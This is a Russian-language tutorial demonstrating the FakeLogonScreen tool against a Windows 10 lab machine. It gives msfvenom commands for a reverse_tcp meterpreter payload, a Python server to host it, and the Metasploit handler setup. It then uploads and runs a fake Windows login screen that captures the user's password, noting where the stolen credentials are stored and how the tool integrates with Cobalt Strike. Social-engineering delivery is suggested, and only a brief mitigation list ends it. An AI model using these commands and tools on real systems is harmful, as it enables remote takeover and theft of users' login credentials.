В этой статье пойдет речь об инструменте, который способен создать фейковый экран входа в систему Windows. Пользователь вводит свои учетные данные, после чего они передаются злоумышленнику. Инструмент может работать по различным сценариям.
Он был разработан Harris Huijgen. Для того чтобы лучше понять работу этого инструмента, будет представлено практическое его применение.
Загрузить все необходимое для начала работы можно, перейдя по ссылке.
Настройка конфигурации
Компьютер хакера:
- ОС: Kali Linux 2020.1
- IP: 192.168.1.13
Компьютер цели:
- ОС: Windows 10 (сборка 18363)
- IP: 192.168.1.11
Сценарий
Есть система, которая подключена к той же сети, что и злоумышленник, и он ищет учетные данные этой системы. Информация о цели, которая уже была добыта, — это IP-адрес и операционная система. Ее довольно легко получить.
Создание полезной нагрузки
Перед началом работы был использован инструмент msfvenom для создания полезной нагрузки в соответствии с операционной системой целевого ПК. Пользователь предоставил свой IP-адрес в качестве LHOST. Поскольку целевая машина работала на ОС Windows, полезная нагрузка была создана в виде исполняемого файла, который можно легко открыть. После создания полезной нагрузки пользователь запустил Python One-liner для создания HTTP-сервера, который будет размещать полезную нагрузку на порту 80 целевой машины.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.233.128 lport=4444 -f exe >> payload.exe
python -m SimpleHTTPServer 80
В настоящем сценарии злоумышленник будет использовать атаку социальной инженерии, чтобы манипулировать целевым пользователем для загрузки мошеннической полезной нагрузки в систему. Это можно провернуть задолго до, собственно, самого совершения атаки.
Запуск листенера
У пользователя уже есть полезная нагрузка, готовая и размещенная в целевом компьютере. Теперь нужно запустить листенер, на который он будет получать сеанс из полезной нагрузки. Установив правильную конфигурацию, пользователь направился прямо к целевой машине и выполнил полезную нагрузку. Это демонстрация в лабораторных условиях. Реальные сценарии будут отличаться.
Загрузка исполняемого файла FakeLogonScreen
После установления сессии meterpreter, пользователь загружает FakeLogonScreen.exe в целевую систему. Этот исполняемый файл можно найти в каталоге, который будет клонирован. После успешной загрузки пользователь попадает в командную строку целевой машины с помощью команды shell. Теперь нужно запустить исполняемый файл, как показано на картинке.
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.233.128
set lport 4444
run
upload FakeLogonScreen.exe
shell
FakeLogonScreen.exe
Ввод учетных данных на целевой машине
Как только был запущен исполняемый файл через шелл, все текущие окна в целевой системе свернулись, и появился экран входа в систему, как показано на рисунке. Он похож на реальный экран входа в систему. Целевой пользователь будет предполагать, что, должно быть, это случайный выход из системы. Таким образом, целевой пользователь неосознанно введет свои учетные данные.
Теперь, чтобы продемонстрировать, что пароль правильный, сначала вводятся неправильные учетные данные. Экран входа в систему выдает ошибку «Неверный пароль. Попробуйте еще раз». Это доказывает, что целевой пользователь должен ввести настоящие учетные данные, чтобы зайти в систему.
Затем были введены настоящие учетные данные и видно, что все свернутые окна восстановлены в прежнем виде.
Получение учетных данных
Как показано на картинке ниже, видно, что листенер FakeLogonScreen работает аналогично кейлоггеру. Сначала был введен «неправильный пароль», чтобы проверить работу листенера. Затем пользователь ввел правильный пароль «123» и успешно получил пароль целевого пользователя.
Дополнительная информация
При определенных настройках рабочего стола все остальные экраны становятся черными. Кроме того, если целевой пользователь настроил не стандартный фон, то этот он будет показан. Это является плюсом в офисной среде, так как эти системы имеют фиксированный пользовательский внешний вид экрана для входа в систему.
Есть также файл FakeLogonScreenToFile.exe, который был загружен ранее. Он работает по аналогичной схеме, но вместе с отображением пароля он сохранит его по следующему пути:
%LOCALAPPDATA%\Microsoft\user.db
Этот инструмент также доступен для Windows 7. При необходимости его можно найти в каталоге “DOTNET35”. Пользователь также способен интегрировать этот инструмент для работы с Cobalt Strike. Проверить это можно, перейдя по ссылке.
Как обезопасить себя?
- Проверять источники загружаемых файлов.
- Следить за каталогом AppData.
- Проверять все ссылки на экране входа в систему.
- Менять чаще пароли для входа в систему Windows.
Автор переведенной статьи: Pavandeep Singh
